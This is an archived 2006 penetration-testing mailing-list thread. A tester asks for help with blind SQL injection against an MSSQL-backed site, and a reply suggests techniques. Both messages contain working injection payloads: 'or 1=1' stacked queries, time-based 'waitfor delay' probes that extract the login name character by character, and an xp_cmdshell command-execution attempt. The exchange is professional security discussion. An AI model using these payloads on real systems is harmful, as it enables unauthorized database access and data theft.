Penetration Testing mailing list archives
Re: Blind SQL Injection Techniques
From: "Leonardo Rodrigues" <leonardo.rsouza () terra com br>
Date: Wed, 13 Dec 2006 18:24:23 -0200
Hi, Try something like this ;if system_user = char(115)+char(97) waitfor delay '0:0:05';-- But if you really want to determine the connection user, break system_user with substring() and test each character... if (SELECT ASCII(SUBSTRING((a.loginame),1,1)) FROM master..sysprocesses AS a WHERE a.spid = @@SPID) > 76 waitfor delay '00:00:05';-- A tool like absinthe (0x90.org) would help you. []'s Leo ----- Original Message ----- From: <One2 () onetwo com> To: <pen-test () securityfocus com> Sent: Wednesday, December 13, 2006 5:41 AM Subject: Blind SQL Injection Techniques
Hi All, I am testing a client at the moment who has a Blind SQL Injection
vulnerability and am running out of techniques, so need some tips.
I injected the following string to validate that the system has an MSSQL
server at the back-end.
or 1=1;select * from sysobjects;-- This returned a valid page. Also injected the following and got a valid page, but again no data since
it is completely blind.
or 1=1;select @@version;-- Replacing sysobjects, in the first example, with an invalid table returns
a custom error page that doesn't disclose anything.
It seems that when injecting any invalid sql statement I get the same
custom error page coming back that doesn't reveal any information.
My next step was to determine whether the DB was running as system. I
tried using the following command;
or 1=1;if (select user) = 'sa' waitfor delay '0:0:5';-- ... but got the error page, indicating that it didn't work - especially
since it didn't take 5 seconds. I then tried simplifying it to just;
waitfor delay '0:0:5';-- ... but again, the error page, indicating this command was not working. I
thought it was the quotes but the following were successful;
or 1=1;select * from 'sysobjects';-- or 1=1;select * from "sysobjects";-- I then tried the following to see if I could actually run system commands; or 1=1;exec master..xp_cmdshell dir;-- ... but this got the error page again indicating unsuccessful. Any suggestions on gaining further information or access on this system
would be appreciated.
Thanks, One2 ------------------------------------------------------------------------ This List Sponsored by: Cenzic Need to secure your web apps? Cenzic Hailstorm finds vulnerabilities fast. Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------ Esta mensagem foi verificada pelo E-mail Protegido Terra. Scan engine: McAfee VirusScan / Atualizado em 13/12/2006 / Versão:
4.4.00/4918
Proteja o seu e-mail Terra: http://mail.terra.com.br/
------------------------------------------------------------------------ This List Sponsored by: Cenzic Need to secure your web apps? Cenzic Hailstorm finds vulnerabilities fast. Click the link to buy it, try it or download Hailstorm for FREE. http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW ------------------------------------------------------------------------
Current thread:
- Blind SQL Injection Techniques One2 (Dec 13)
- Re: Blind SQL Injection Techniques Leonardo Rodrigues (Dec 16)
- RE: Blind SQL Injection Techniques Paul Melson (Dec 16)
- RE: Blind SQL Injection Techniques Gurpreet Singh (Dec 16)
- Re: Blind SQL Injection Techniques Rick Zhong (Dec 19)
- <Possible follow-ups>
- Re: Blind SQL Injection Techniques Paulo Ribeiro (Dec 16)